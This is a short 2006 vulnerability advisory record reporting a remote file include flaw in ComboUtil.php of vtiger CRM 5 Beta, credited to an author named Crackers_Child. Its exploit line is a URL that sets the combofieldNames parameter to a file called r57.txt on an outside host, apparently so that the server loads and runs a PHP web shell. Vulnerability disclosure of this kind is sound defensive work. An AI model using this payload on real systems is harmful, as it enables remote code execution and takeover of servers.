vtiger CRM 5 Beta Remote File Include Vulnerability

2006-09-27T00:00:00
ID SECURITYVULNS:DOC:14435
Type securityvulns
Reporter Securityvulns
Modified 2006-09-27T00:00:00

Description

!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!

Title : vtiger CRM 5 Beta Remote File Include Vulnerability


Author: Crackers_Child

cont@ct: crackers_child@sibersavascilar.com

-------------------------

Download : http://vtiger.com

Bug in ComboUtil.php

require_once('include/database/PearDatabase.php'); function getComboArray($combofieldNames)


Exploit:

http://www.site.com/vtiger_path/include/ComboUtil.php?combofieldNames=http://siberaktif.net/r57.txt ?